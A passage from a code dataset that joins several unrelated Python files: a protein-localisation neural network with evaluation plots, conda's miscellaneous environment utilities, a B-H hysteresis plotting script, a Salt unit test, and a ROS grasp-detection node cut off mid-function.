l_conv_b = layers.Conv1D(self.n_filt, 5, strides=1, padding="same", activation="relu",
data_format='channels_first')(l_permute)
l_conc = tf.keras.layers.Concatenate(axis=1)([l_conv_a, l_conv_b])
l_conv_final = layers.Conv1D(
self.n_filt * 2, 3, strides=1, padding="same", activation="relu", data_format='channels_first')(l_conc)
l_reshu = layers.Permute((2, 1))(l_conv_final)
# encoders LSTM
l_lstm, forward_h, forward_c, backward_h, backward_c = layers.Bidirectional \
(layers.LSTM(self.n_hid, dropout=self.drop_prob, return_sequences=True, return_state=True,
activation="tanh"))(l_reshu)
state_h = layers.Concatenate()([forward_h, backward_h])
state_c = layers.Concatenate()([forward_c, backward_c])
# Set up the attention layer
context_vector, self.attention_weights = Attention(self.n_hid * 2)(inputs=l_lstm, hidden=state_h)
l_dense = layers.Dense(self.n_hid * 2, activation="relu")(context_vector)
l_drop = layers.Dropout(self.drop_prob)(l_dense)
l_out_subcellular = layers.Dense(self.n_class, activation="softmax", name="subcellular")(l_drop)
l_out_membrane = layers.Dense(self.n_membrane_class, activation="softmax", name="membrane")(l_drop)
self.model = keras.Model(inputs, [l_out_subcellular, l_out_membrane])
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss=['categorical_crossentropy', 'categorical_crossentropy'],
optimizer=optimizers.Adam(learning_rate=self.lr, clipnorm=3), metrics=['accuracy'])
if not self.random_search:
return self.model
else:
history = self.model.fit(X_train, [y_train[0], y_train[1]], epochs=120, batch_size=params['batch_size'],
validation_data=(X_val, [y_val[0], y_val[1]]), shuffle=True)
return history, self.model
def create_CNN_LSTM_Attention_complete(self, hp=None):
"""
Building the network by defining its architecture: an input layer, two convolutional layers, a bidirectional
LSTM, an attention layer, a dense layer and an output layer.
        :param hp: optional hyperparameter container. A HyperParameters instance contains
            information about both the search space and the current values of each hyperparameter.
"""
# Build model
inputs = keras.Input(shape=(self.seq_len, self.n_feat))
l_drop1 = layers.Dropout(self.drop_prob)(inputs)
l_permute = layers.Permute((2, 1))(l_drop1)
# Size of convolutional layers
f_size_a = 1
f_size_b = 3
f_size_c = 5
f_size_d = 9
f_size_e = 15
f_size_f = 21
# initialization with random orthogonal weights using sqrt(2) for rectified linear units as scaling factor
initializer = tf.keras.initializers.Orthogonal(gain=math.sqrt(2))
l_conv_a = layers.Conv1D(self.n_filt, f_size_a, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
l_conv_b = layers.Conv1D(self.n_filt, f_size_b, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
l_conv_c = layers.Conv1D(self.n_filt, f_size_c, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
l_conv_d = layers.Conv1D(self.n_filt, f_size_d, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
l_conv_e = layers.Conv1D(self.n_filt, f_size_e, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
l_conv_f = layers.Conv1D(self.n_filt, f_size_f, strides=1, padding="same", kernel_initializer=initializer,
activation="relu", data_format='channels_first')(l_permute)
# concatenate all convolutional layers
l_conc = tf.keras.layers.Concatenate(axis=1)([l_conv_a, l_conv_b, l_conv_c, l_conv_d, l_conv_e, l_conv_f])
l_reshu = layers.Permute((2, 1))(l_conc)
l_conv_final = layers.Conv1D(
filters=128, kernel_size=f_size_b, strides=1, padding="same", activation="relu",
data_format='channels_first')(l_reshu)
# encoders LSTM
l_lstm, forward_h, forward_c, backward_h, backward_c = layers.Bidirectional \
(layers.LSTM(self.n_hid, dropout=self.drop_hid, return_sequences=True, return_state=True,
activation="tanh")) \
(l_conv_final)
state_h = layers.Concatenate()([forward_h, backward_h])
state_c = layers.Concatenate()([forward_c, backward_c])
# Set up the attention layer
context_vector, self.attention_weights = Attention(self.n_hid * 2)(l_lstm, state_h)
l_drop2 = layers.Dropout(self.drop_hid)(context_vector)
l_dense = layers.Dense(self.n_hid * 2, activation="relu", kernel_initializer=initializer)(l_drop2)
l_drop3 = layers.Dropout(self.drop_hid)(l_dense)
l_out = layers.Dense(self.n_class, activation="softmax", kernel_initializer=initializer)(l_drop3)
self.model = keras.Model(inputs, l_out)
# gradient clipping clips parameters' gradients during backprop by a maximum value of 2
# with clipnorm the gradients will be clipped when their L2 norm exceeds this value.
self.model.compile(loss='categorical_crossentropy',
optimizer=optimizers.Adam(learning_rate=self.lr, clipvalue=2, clipnorm=3),
metrics=['accuracy'])
# setting initial state tensors to be passed to the first call of the cell (cell init and hid init in
# bidirectional LSTM)
self.model.layers[12].initial_states = [tf.keras.initializers.Orthogonal(), tf.keras.initializers.Orthogonal()]
return self.model
def prepare_metrics(self, history, X_val, validation, num_epochs):
self.history = history
self.X_val = X_val
self.validation = validation
self.num_epochs = num_epochs
def confusion_matrix_location(self):
        # The confusion matrix shows how well each class is predicted and which mis-classifications are most common.
Y_pred = self.model.predict(self.X_val)
# taking prediction for subcellular location
y_pred = np.argmax(Y_pred[0], axis=1)
self.confusion_mat = confusion_matrix(self.validation['y_val_location'], y_pred)
plt.figure(figsize=(8, 8))
colormap = plt.cm.Blues
plt.imshow(self.confusion_mat, interpolation='nearest', cmap=colormap)
plt.title('Confusion matrix on subcellular location - validation set')
plt.colorbar()
tick_marks = np.arange(self.n_class)
plt.xticks(tick_marks, self.classes_subcellular, rotation=60)
plt.yticks(tick_marks, self.classes_subcellular)
thresh = self.confusion_mat.max() / 2.
for i, j in itertools.product(range(self.confusion_mat.shape[0]), range(self.confusion_mat.shape[1])):
plt.text(j, i, self.confusion_mat[i, j], horizontalalignment="center",
color="white" if self.confusion_mat[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True location')
plt.xlabel('Predicted location')
plt.show()
def confusion_matrix_membrane(self):
        # The confusion matrix shows how well each class is predicted and which mis-classifications are most common.
Y_pred = self.model.predict(self.X_val)
# taking the prediction for membrane
y_pred = np.argmax(Y_pred[1], axis=1)
self.confusion_mat = confusion_matrix(self.validation['y_val_membrane'], y_pred)
plt.figure(figsize=(8, 8))
colormap = plt.cm.Blues
plt.imshow(self.confusion_mat, interpolation='nearest', cmap=colormap)
plt.title('Confusion matrix on membrane - validation set')
plt.colorbar()
tick_marks = np.arange(3)
plt.xticks(tick_marks, self.classes_membrane, rotation=60)
plt.yticks(tick_marks, self.classes_membrane)
thresh = self.confusion_mat.max() / 2.
for i, j in itertools.product(range(self.confusion_mat.shape[0]), range(self.confusion_mat.shape[1])):
plt.text(j, i, self.confusion_mat[i, j], horizontalalignment="center",
color="white" if self.confusion_mat[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True membrane')
plt.xlabel('Predicted membrane')
plt.show()
def attention_graph(self):
intermediate_layer_model = keras.Model(inputs=self.model.input,
outputs=self.model.layers[3].output)
intermediate_output = intermediate_layer_model(self.X_val)
alphas = np.array(intermediate_output[1])
y_val = self.validation['y_val_location']
sort_ind = np.argsort(y_val)
# alphas shape is of the form (#sequences, length sequence, 1), e.g. (635, 400, 1)
alphas_1 = np.array(alphas).reshape((alphas.shape[0], alphas.shape[1]))[sort_ind]
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 15))
labels_plot = ax1.imshow(y_val[sort_ind].reshape(alphas.shape[0], 1), cmap=plt.get_cmap('Set1'))
ax1.set_aspect(0.3)
ax1.set_axis_off()
cb = plt.colorbar(labels_plot)
labels = np.arange(0, 10, 1)
loc = labels + .5
cb.set_ticks(loc)
cb.set_ticklabels(self.classes_subcellular)
att_plot = ax2.imshow(alphas_1, aspect='auto')
ax2.yaxis.set_visible(True)
plt.tight_layout(pad=25, w_pad=0.5, h_pad=1.0)
def MCC(self):
        # The Matthews correlation coefficient (MCC) measures the quality of a classification,
        # taking true and false positives and negatives into account. It is a balanced measure
        # that can be used even if the classes are of very different sizes.
        # The MCC is in essence a correlation coefficient with a value between -1 and +1:
        # +1 represents a perfect prediction, 0 an average random prediction and -1 an
        # inverse prediction. Here it scores the membrane output head.
Y_pred = self.model.predict(self.X_val)
y_pred = np.argmax(Y_pred[1], axis=1)
return matthews_corrcoef(self.validation['y_val_membrane'], y_pred)
def gorodkin(self):
        # The Gorodkin measure is the multiclass generalisation of the MCC described above;
        # sklearn's matthews_corrcoef applied to the multiclass subcellular-location labels
        # computes it directly, and it likewise ranges between -1 and +1.
Y_pred = self.model.predict(self.X_val)
y_pred = np.argmax(Y_pred[0], axis=1)
return matthews_corrcoef(self.validation['y_val_location'], y_pred)
def accuracy_loss_plots_subcellular(self):
x_axis = range(self.num_epochs)
plt.figure(figsize=(8, 6))
# loss_training:
plt.plot(x_axis, self.history.history['subcellular_loss'])
# loss_validation
plt.plot(x_axis, self.history.history['val_subcellular_loss'])
plt.xlabel('Epoch')
plt.title("Loss on Subcellular localization")
plt.ylabel('Error')
plt.legend(('Training', 'Validation'))
plt.show()
plt.figure(figsize=(8, 6))
# accuracy_training:
plt.plot(x_axis, self.history.history['subcellular_accuracy'])
# accuracy_validation
plt.plot(x_axis, self.history.history['val_subcellular_accuracy'])
plt.xlabel('Epoch')
plt.title("Accuracy on Subcellular localization")
plt.ylabel('Accuracy')
plt.legend(('Training', 'Validation'))
plt.show()
def accuracy_loss_plots_membrane(self):
x_axis = range(self.num_epochs)
plt.figure(figsize=(8, 6))
# loss_training:
plt.plot(x_axis, self.history.history['membrane_loss'])
# loss_validation
plt.plot(x_axis, self.history.history['val_membrane_loss'])
plt.xlabel('Epoch')
plt.title("Loss on membrane")
plt.ylabel('Error')
plt.legend(('Training', 'Validation'))
plt.show()
plt.figure(figsize=(8, 6))
# accuracy_training:
plt.plot(x_axis, self.history.history['membrane_accuracy'])
# accuracy_validation
plt.plot(x_axis, self.history.history['val_membrane_accuracy'])
plt.xlabel('Epoch')
plt.title("Accuracy on membrane")
plt.ylabel('Accuracy')
plt.legend(('Training', 'Validation'))
plt.show()
def print_measures(self, net_name):
acc_index = np.argmin(self.history.history['val_loss'])
global_loss_min = self.history.history['val_loss'][acc_index]
loss_subcellular = self.history.history['val_subcellular_loss'][acc_index]
loss_membrane = self.history.history['val_membrane_loss'][acc_index]
subcellular_accuracy = self.history.history['val_subcellular_accuracy'][acc_index]
membrane_accuracy = self.history.history['val_membrane_accuracy'][acc_index]
print("Best values for Network {}".format(net_name))
print("-------------------------------------")
print("Minimum global loss: {:.6f}".format(global_loss_min))
print("With validation loss (subcellular localization): {:.6f}".format(loss_subcellular))
print("With validation loss (membrane): {:.6f}".format(loss_membrane))
print("With accuracy (subcellular localization): {:.6f}".format(subcellular_accuracy))
print("With accuracy (membrane): {:.6f}".format(membrane_accuracy))
print("Gorodkin measure on validation (subcellular localization): {}".format(self.gorodkin()))
print("MCC measure on validation (membrane): {}".format(self.MCC()))
avg_line_length: 51.211509 | max_line_length: 138 | alphanum_fraction: 0.650764
794d8f040221fc90fe127e9a149fd01c59dbfd63 | size: 11431 | py | Python | conda/misc.py | astrojuanlu/conda @ badf048f5e8287250ef1940249a048f9bde08477 | ["BSD-3-Clause"] | stars: null | issues: null | forks: null
# this module contains miscellaneous stuff which eventually could be moved
# into other places
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import defaultdict
import os
from os.path import (abspath, dirname, exists, expanduser, isdir, isfile, islink, join,
relpath)
import re
import shutil
import sys
from ._vendor.auxlib.path import expand
from .base.context import context
from .common.compat import iteritems, iterkeys, itervalues, on_win
from .common.path import url_to_path, win_path_ok
from .common.url import is_url, join_url, path_to_url
from .core.index import get_index, supplement_index_with_cache
from .core.linked_data import linked_data
from .core.package_cache import PackageCache, ProgressiveFetchExtract
from .exceptions import CondaFileNotFoundError, CondaRuntimeError, ParseError
from .gateways.disk.delete import rm_rf
from .instructions import LINK, UNLINK
from .models.dist import Dist
from .models.index_record import IndexRecord
from .plan import execute_actions
from .resolve import MatchSpec, Resolve
def conda_installed_files(prefix, exclude_self_build=False):
"""
Return the set of files which have been installed (using conda) into
a given prefix.
"""
res = set()
for dist, meta in iteritems(linked_data(prefix)):
if exclude_self_build and 'file_hash' in meta:
continue
res.update(set(meta.get('files', ())))
return res
url_pat = re.compile(r'(?:(?P<url_p>.+)(?:[/\\]))?'
r'(?P<fn>[^/\\#]+\.tar\.bz2)'
                     r'(?:#(?P<md5>[0-9a-f]{32}))?$')
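# Illustration (hypothetical URL): for a spec such as
#   https://repo.example.com/linux-64/foo-1.0-0.tar.bz2#0123456789abcdef0123456789abcdef
# the groups come out as url_p='https://repo.example.com/linux-64',
# fn='foo-1.0-0.tar.bz2' and md5 set to the 32-hex fragment.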
def explicit(specs, prefix, verbose=False, force_extract=True, index_args=None, index=None):
actions = defaultdict(list)
actions['PREFIX'] = prefix
fetch_recs = {}
for spec in specs:
if spec == '@EXPLICIT':
continue
if not is_url(spec):
spec = path_to_url(expand(spec))
# parse URL
m = url_pat.match(spec)
if m is None:
raise ParseError('Could not parse explicit URL: %s' % spec)
url_p, fn, md5sum = m.group('url_p'), m.group('fn'), m.group('md5')
url = join_url(url_p, fn)
# url_p is everything but the tarball_basename and the md5sum
# If the path points to a file in the package cache, we need to use
# the dist name that corresponds to that package. The MD5 may not
# match, but we will let PFE below worry about that
dist = None
if url.startswith('file:/'):
path = win_path_ok(url_to_path(url))
if dirname(path) in context.pkgs_dirs:
if not exists(path):
raise CondaFileNotFoundError(path)
pc_entry = PackageCache.tarball_file_in_cache(path)
dist = pc_entry.dist
url = dist.to_url() or pc_entry.get_urls_txt_value()
md5sum = md5sum or pc_entry.md5sum
dist = dist or Dist(url)
fetch_recs[dist] = {'md5': md5sum, 'url': url}
# perform any necessary fetches and extractions
if verbose:
from .console import setup_verbose_handlers
setup_verbose_handlers()
link_dists = tuple(iterkeys(fetch_recs))
pfe = ProgressiveFetchExtract(fetch_recs, link_dists)
pfe.execute()
# Now get the index---but the only index we need is the package cache
index = {}
supplement_index_with_cache(index, ())
# unlink any installed packages with same package name
link_names = {index[d]['name'] for d in link_dists}
actions[UNLINK].extend(d for d, r in iteritems(linked_data(prefix))
if r['name'] in link_names)
actions[LINK].extend(link_dists)
execute_actions(actions, index, verbose=verbose)
return actions
def rel_path(prefix, path, windows_forward_slashes=True):
res = path[len(prefix) + 1:]
if on_win and windows_forward_slashes:
res = res.replace('\\', '/')
return res
def walk_prefix(prefix, ignore_predefined_files=True, windows_forward_slashes=True):
"""
Return the set of all files in a given prefix directory.
"""
res = set()
prefix = abspath(prefix)
ignore = {'pkgs', 'envs', 'conda-bld', 'conda-meta', '.conda_lock',
'users', 'LICENSE.txt', 'info', 'conda-recipes', '.index',
'.unionfs', '.nonadmin'}
binignore = {'conda', 'activate', 'deactivate'}
if sys.platform == 'darwin':
ignore.update({'python.app', 'Launcher.app'})
for fn in os.listdir(prefix):
if ignore_predefined_files and fn in ignore:
continue
if isfile(join(prefix, fn)):
res.add(fn)
continue
for root, dirs, files in os.walk(join(prefix, fn)):
should_ignore = ignore_predefined_files and root == join(prefix, 'bin')
for fn2 in files:
if should_ignore and fn2 in binignore:
continue
res.add(relpath(join(root, fn2), prefix))
for dn in dirs:
path = join(root, dn)
if islink(path):
res.add(relpath(path, prefix))
if on_win and windows_forward_slashes:
return {path.replace('\\', '/') for path in res}
else:
return res
def untracked(prefix, exclude_self_build=False):
"""
Return (the set) of all untracked files for a given prefix.
"""
conda_files = conda_installed_files(prefix, exclude_self_build)
return {path for path in walk_prefix(prefix) - conda_files
if not (path.endswith('~') or
(sys.platform == 'darwin' and path.endswith('.DS_Store')) or
(path.endswith('.pyc') and path[:-1] in conda_files))}
def which_prefix(path):
"""
given the path (to a (presumably) conda installed file) return the
environment prefix in which the file in located
"""
prefix = abspath(path)
while True:
if isdir(join(prefix, 'conda-meta')):
            # we found it, so return it
return prefix
if prefix == dirname(prefix):
# we cannot chop off any more directories, so we didn't find it
return None
prefix = dirname(prefix)
def touch_nonadmin(prefix):
"""
Creates $PREFIX/.nonadmin if sys.prefix/.nonadmin exists (on Windows)
"""
if on_win and exists(join(context.root_dir, '.nonadmin')):
if not isdir(prefix):
os.makedirs(prefix)
with open(join(prefix, '.nonadmin'), 'w') as fo:
fo.write('')
def append_env(prefix):
dir_path = abspath(expanduser('~/.conda'))
try:
if not isdir(dir_path):
os.mkdir(dir_path)
with open(join(dir_path, 'environments.txt'), 'a') as f:
f.write('%s\n' % prefix)
except IOError:
pass
def clone_env(prefix1, prefix2, verbose=True, quiet=False, index_args=None):
"""
clone existing prefix1 into new prefix2
"""
untracked_files = untracked(prefix1)
# Discard conda, conda-env and any package that depends on them
drecs = linked_data(prefix1)
filter = {}
found = True
while found:
found = False
for dist, info in iteritems(drecs):
name = info['name']
if name in filter:
continue
if name == 'conda':
filter['conda'] = dist
found = True
break
if name == "conda-env":
filter["conda-env"] = dist
found = True
break
for dep in info.get('depends', []):
if MatchSpec(dep).name in filter:
filter[name] = dist
found = True
if filter:
if not quiet:
print('The following packages cannot be cloned out of the root environment:')
for pkg in itervalues(filter):
print(' - ' + pkg.dist_name)
drecs = {dist: info for dist, info in iteritems(drecs) if info['name'] not in filter}
# Resolve URLs for packages that do not have URLs
r = None
index = {}
unknowns = [dist for dist, info in iteritems(drecs) if not info.get('url')]
notfound = []
if unknowns:
index_args = index_args or {}
index = get_index(**index_args)
r = Resolve(index, sort=True)
for dist in unknowns:
name = dist.dist_name
fn = dist.to_filename()
fkeys = [d for d in r.index.keys() if r.index[d]['fn'] == fn]
if fkeys:
del drecs[dist]
dist_str = sorted(fkeys, key=r.version_key, reverse=True)[0]
drecs[Dist(dist_str)] = r.index[dist_str]
else:
notfound.append(fn)
if notfound:
what = "Package%s " % ('' if len(notfound) == 1 else 's')
notfound = '\n'.join(' - ' + fn for fn in notfound)
msg = '%s missing in current %s channels:%s' % (what, context.subdir, notfound)
raise CondaRuntimeError(msg)
# Assemble the URL and channel list
urls = {}
for dist, info in iteritems(drecs):
fkey = dist
if fkey not in index:
index[fkey] = IndexRecord.from_objects(info, not_fetched=True)
r = None
urls[dist] = info['url']
if r is None:
r = Resolve(index)
dists = r.dependency_sort({d.quad[0]: d for d in urls.keys()})
urls = [urls[d] for d in dists]
if verbose:
print('Packages: %d' % len(dists))
print('Files: %d' % len(untracked_files))
for f in untracked_files:
src = join(prefix1, f)
dst = join(prefix2, f)
dst_dir = dirname(dst)
if islink(dst_dir) or isfile(dst_dir):
rm_rf(dst_dir)
if not isdir(dst_dir):
os.makedirs(dst_dir)
if islink(src):
os.symlink(os.readlink(src), dst)
continue
try:
with open(src, 'rb') as fi:
data = fi.read()
except IOError:
continue
try:
s = data.decode('utf-8')
s = s.replace(prefix1, prefix2)
data = s.encode('utf-8')
except UnicodeDecodeError: # data is binary
pass
with open(dst, 'wb') as fo:
fo.write(data)
shutil.copystat(src, dst)
actions = explicit(urls, prefix2, verbose=not quiet, index=index,
force_extract=False, index_args=index_args)
return actions, untracked_files
def make_icon_url(info):
if info.get('channel') and info.get('icon'):
base_url = dirname(info['channel'])
icon_fn = info['icon']
# icon_cache_path = join(pkgs_dir, 'cache', icon_fn)
# if isfile(icon_cache_path):
# return url_path(icon_cache_path)
return '%s/icons/%s' % (base_url, icon_fn)
return ''
def list_prefixes():
# Lists all the prefixes that conda knows about.
for envs_dir in context.envs_dirs:
if not isdir(envs_dir):
continue
for dn in sorted(os.listdir(envs_dir)):
if dn.startswith('.'):
continue
prefix = join(envs_dir, dn)
if isdir(prefix):
prefix = join(envs_dir, dn)
yield prefix
yield context.root_dir
avg_line_length: 34.224551 | max_line_length: 97 | alphanum_fraction: 0.593036
794d8f5be6b479b0f51c6e40fdfe4046cd62bcd9 | size: 3096 | py | Python | Transformer/B-H-Diagram.py | AlexTsagas/Quality-Graphs @ eb03f0baf84db4343d6048143ababa724813de94 | ["MIT"] | stars: 1 (2021-10-03) | issues: null | forks: null
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import rc
import pandas as pd
from scipy import integrate
# Write with LaTeX
rc('text', usetex=True)
rc('font', family='serif')
# Read .csv file
B_s, B_e = [], []
H_s, H_e = [], []
m_s, m_e = [], []
file = pd.read_csv('D2-Measurments.csv', header=None)
B_e, B_s = file[1][10:-11], file[6][12:]
H_e, H_s = file[2][10:-11], file[7][12:]
m_e, m_s = file[3][10:-11], file[8][12:]
m_s[22], m_s[40] = 0, 0
m_e[16], m_e[30] = 0, 0
# Convert to numbers
B_e, B_s = [int(Be) for Be in B_e], [int(Bs) for Bs in B_s]
H_e, H_s = [int(He) for He in H_e], [int(Hs) for Hs in H_s]
m_e, m_s = [float(me) for me in m_e], [float(ms) for ms in m_s]
# Integrals
BB_e, HH_e = [Be*0.001 + 0.950 for Be in B_e], [He + 5050 for He in H_e]
## Plot to see where we integrate
# plt.plot(HH_e[:14], BB_e[:14], color='black')
# plt.plot(HH_e[13:-1], BB_e[13:-1], color='red')
# plt.show()
Ie1, Ie2 = integrate.simps(y=BB_e[:14], x=HH_e[:14], even='avg'), integrate.simps(y=BB_e[13:-1], x=HH_e[13:-1], even='avg')
Ie = Ie1 + Ie2
BB_s, HH_s = [Bs*0.001 + 0.550 for Bs in B_s], [Hs + 8000 for Hs in H_s]
## Plot to see where we integrate
# plt.plot(HH_s[:21], BB_s[:21], color='black')
# plt.plot(HH_s[20:], BB_s[20:], color='red')
# plt.show()
Is1, Is2 = integrate.simps(BB_s[:21], HH_s[:21], even='avg'), integrate.simps(BB_s[20:], HH_s[20:], even = 'avg')
Is = Is1+Is2
# Plot
fig1, (ax1, ax2) = plt.subplots(1,2)
# Compact
ax1.plot(H_s, B_s, color='black', linewidth=1, marker='.')
ax1.set_xlabel(r'$H$' r' (A/m)')
ax1.set_ylabel(r'$B$' r' (mT)')
ax1.tick_params(labelsize = 6)
ax1.set_xticks(ticks = np.arange(-8000,8001,2000))
ax1.set_yticks(ticks = np.arange(-600,601,100))
ax1.set_title("Compact Core")
ax1.grid()
# Laminated
ax2.plot(H_e, B_e, color='red', linewidth=1, marker='.')
ax2.set_xlabel(r'$H$' r' (A/m)')
ax2.set_ylabel(r'$B$' r' (mT)')
ax2.tick_params(labelsize = 6)
ax2.set_xticks(ticks = np.arange(-6000,6001,2000))
ax2.set_yticks(ticks = np.arange(-1000,1001,100))
ax2.set_title("Laminated Core")
ax2.grid()
fig1.tight_layout()
# Fix infinity
## Print to see where infinities occur
# print(m_s)
m_s.pop(10)
H_s.pop(10)
m_s.pop(27)
H_s.pop(27)
# print(m_s, H_s)
m_e.pop(6)
H_e.pop(6)
m_e.pop(19)
H_e.pop(19)
# Plot
fig2, (ax3, ax4) = plt.subplots(1,2)
# Compact
ax3.plot(H_s, m_s, color='black', linewidth=1, marker='.')
ax3.set_xlabel(r'$H$' r' (A/m)')
ax3.set_ylabel(r'$\mu$' r' ($10^{-3}$ N/A$^2$)')
ax3.tick_params(labelsize = 6)
ax3.set_xticks(ticks = np.arange(-8000,8001,2000))
ax3.set_yticks(ticks = np.arange(-0.05,0.31,0.05))
ax3.set_title("Compact Core")
ax3.grid()
# Laminated
ax4.plot(H_e, m_e, color='red', linewidth=1, marker='.')
ax4.set_xlabel(r'$H$' r' (A/m)')
ax4.set_ylabel(r'$\mu$' r' ($10^{-3}$ N/A$^2$)')
ax4.tick_params(labelsize = 6)
ax4.set_xticks(ticks = np.arange(-6000,6001,2000))
ax4.set_yticks(ticks = np.arange(0.17,0.25,0.01))
ax4.set_title("Laminated Core")
ax4.grid()
fig2.tight_layout()
plt.show()
print(f'\nWork on Laminated core = {Ie} J, \nWork on Compact Core = {Is} J')
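# Illustrative sketch (not part of the measurement analysis): the work values
# above are the areas enclosed by the B-H loops; for a closed polygon the
# shoelace formula yields the same quantity, e.g. for a unit square:
H_demo = np.array([0.0, 1.0, 1.0, 0.0])
B_demo = np.array([0.0, 0.0, 1.0, 1.0])
area_demo = 0.5 * abs(np.dot(H_demo, np.roll(B_demo, -1)) - np.dot(B_demo, np.roll(H_demo, -1)))
print(f'Shoelace check on a unit square: {area_demo} (expected 1.0)')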
avg_line_length: 25.377049 | max_line_length: 123 | alphanum_fraction: 0.64438
794d8ff1f62517bb0385bcbfbb67afa1cba7ed5c | size: 1213 | py | Python | tests/unit/states/test_eselect.py | velom/salt (stars: 1, 2021-04-05) / dv-trading/salt (issues: null, forks: null) @ f5d4334178c50d0dfcd205d5a7fb9cfb27fd369e | ["Apache-2.0"]
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`Jayesh Kariya <jayeshk@saltstack.com>`
'''
# Import Python libs
from __future__ import absolute_import
# Import Salt Testing Libs
from tests.support.unit import skipIf, TestCase
from tests.support.mock import (
NO_MOCK,
NO_MOCK_REASON,
MagicMock,
patch)
# Import Salt Libs
from salt.states import eselect
eselect.__salt__ = {}
@skipIf(NO_MOCK, NO_MOCK_REASON)
class EselectTestCase(TestCase):
'''
Test cases for salt.states.eselect
'''
# 'set_' function tests: 1
def test_set_(self):
'''
Test to verify that the given module is set to the given target
'''
name = 'myeselect'
target = 'hardened/linux/amd64'
ret = {'name': name,
'result': True,
'comment': '',
'changes': {}}
mock = MagicMock(return_value=target)
with patch.dict(eselect.__salt__, {'eselect.get_current_target': mock}):
comt = ('Target \'{0}\' is already set on \'{1}\' module.'
.format(target, name))
ret.update({'comment': comt})
self.assertDictEqual(eselect.set_(name, target), ret)
avg_line_length: 25.808511 | max_line_length: 80 | alphanum_fraction: 0.597692
794d8fffa4644b04f1b8779986a16cec6e902586 | size: 7975 | py | Python | scripts/run_ggcnn_with_detection.py | kamilmlodzikowski/ggcnn_ur5_grasping @ 8604813360357aef82ab2516fef0d66e55d4b6ef | ["BSD-3-Clause"] | stars: null | issues: null | forks: null
#! /home/kamil/robot40human_ws/src/ggcnn_ur5_grasping/python_ggcnn/bin/python3
import time
import numpy as np
import tensorflow as tf
from keras.models import load_model
from tensorflow.keras.models import Sequential
import cv2
import scipy.ndimage as ndimage
from skimage.draw import circle
from skimage.feature import peak_local_max
import os
import sys
import rospy
from cv_bridge import CvBridge
from geometry_msgs.msg import PoseStamped
from sensor_msgs.msg import Image, CameraInfo
from std_msgs.msg import Float32MultiArray
bridge = CvBridge()
mypath = homedir = os.path.expanduser("~")
# Load the Network.
mypath='/home/kamil/robot40human_ws/src/ggcnn_ur5_grasping/ggcnn/data/networks/ggcnn_rss/epoch_29_model.hdf5'
MODEL_FILE = '/home/kamil/robot40human_ws/src/ggcnn_ur5_grasping/ggcnn/data/networks/ggcnn_rss/epoch_29_model.hdf5'
model = load_model(mypath)
model.compile()
model.run_eagerly = True
print("\nEAGERLY:")
print(model.run_eagerly)
rospy.init_node('ggcnn_detection')
# Output publishers.
grasp_pub = rospy.Publisher('ggcnn/img/grasp', Image, queue_size=1)
#grasp_plain_pub = rospy.Publisher('ggcnn/img/grasp_plain', Image, queue_size=1)
#depth_pub = rospy.Publisher('ggcnn/img/depth', Image, queue_size=1)
#ang_pub = rospy.Publisher('ggcnn/img/ang', Image, queue_size=1)
cmd_pub = rospy.Publisher('ggcnn/out/command', Float32MultiArray, queue_size=1)
# Initialise some globals.
prev_mp = np.array([150, 150])
ROBOT_Z = 0
# Tensorflow graph to allow use in callback.
graph = tf.compat.v1.get_default_graph()
# Get the camera parameters
print('Waiting for /camera_info')
camera_info_msg = rospy.wait_for_message('/camera/aligned_depth_to_color/camera_info', CameraInfo)
print('Got /camera_info, moving on')
K = camera_info_msg.K
fx = K[0]
cx = K[2]
fy = K[4]
cy = K[5]
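# Illustrative helper (not used by the node): pinhole back-projection of a
# pixel (u, v) at depth d to camera coordinates -- the same transform applied
# inside depth_callback below.
def backproject_pixel(u, v, d):
    return ((u - cx) * d / fx, (v - cy) * d / fy, d)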
# Execution Timing
class TimeIt:
def __init__(self, s):
self.s = s
self.t0 = None
self.t1 = None
self.print_output = False
def __enter__(self):
self.t0 = time.time()
def __exit__(self, t, value, traceback):
self.t1 = time.time()
if self.print_output:
print('%s: %s' % (self.s, self.t1 - self.t0))
def robot_pos_callback(data):
global ROBOT_Z
ROBOT_Z = data.pose.position.z
def depth_callback(depth_message):
global model
global graph
global prev_mp
global ROBOT_Z
global fx, cx, fy, cy
with TimeIt('Crop'):
depth = bridge.imgmsg_to_cv2(depth_message)
        depth_med = np.median(depth)
depth = np.where(depth<=50, depth_med, depth)
depth = np.where(depth>depth_med-10, depth_med, depth)
# Crop a square out of the middle of the depth and resize it to 300*300
crop_size = 400 # depth.shape[0]
depth_crop = cv2.resize(depth[(480-crop_size)//2:(480-crop_size)//2+crop_size, (640-crop_size)//2:(640-crop_size)//2+crop_size], (300, 300))
# Replace nan with 0 for inpainting.
depth_crop = depth_crop.copy()
depth_nan = np.isnan(depth_crop).copy()
depth_crop[depth_nan] = 0
with TimeIt('Inpaint'):
# open cv inpainting does weird things at the border.
depth_crop = cv2.copyMakeBorder(depth_crop, 1, 1, 1, 1, cv2.BORDER_DEFAULT)
mask = (depth_crop == 0).astype(np.uint8)
# Scale to keep as float, but has to be in bounds -1:1 to keep opencv happy.
depth_scale = np.abs(depth_crop).max()
depth_crop = depth_crop.astype(np.float32)/depth_scale # Has to be float32, 64 not supported.
depth_crop = cv2.inpaint(depth_crop, mask, 1, cv2.INPAINT_NS)
# Back to original size and value range.
depth_crop = depth_crop[1:-1, 1:-1]
depth_crop = depth_crop * depth_scale
with TimeIt('Calculate Depth'):
# Figure out roughly the depth in mm of the part between the grippers for collision avoidance.
depth_center = depth_crop[100:141, 130:171].flatten()
depth_center.sort()
depth_center = depth_center[:10].mean() * 1000
with TimeIt('Inference'):
# Run it through the network.
depth_crop = np.clip((depth_crop - depth_crop.mean()), -1, 1)
#with graph.as_default():
pred_out = model.predict(depth_crop.reshape((1, 300, 300, 1)))
points_out = pred_out[0].squeeze()
